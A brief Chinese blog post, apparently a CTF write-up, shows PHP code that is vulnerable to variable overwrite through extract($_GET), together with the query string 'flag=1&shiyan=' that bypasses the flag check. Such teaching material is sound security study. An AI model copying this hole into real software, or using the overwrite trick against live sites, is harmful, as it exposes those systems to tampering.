PHP变量覆盖漏洞

$flag='xxx'; 

extract($_GET);

if(isset($shiyan))

     { $content=trim(file_get_contents($flag)); 

if($shiyan==$content)

     { echo'ctf{xxx}'; } else{ echo'Oh.no';} }



构造flag=1&shiyan=

阅读更多
版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/wangjian1012/article/details/51553284
个人分类: WEB安全
想对作者说点什么? 我来说一句

没有更多推荐了,返回首页

不良信息举报

PHP变量覆盖漏洞

最多只允许输入30个字

加入CSDN,享受更精准的内容推荐,与500万程序员共同成长!
关闭
关闭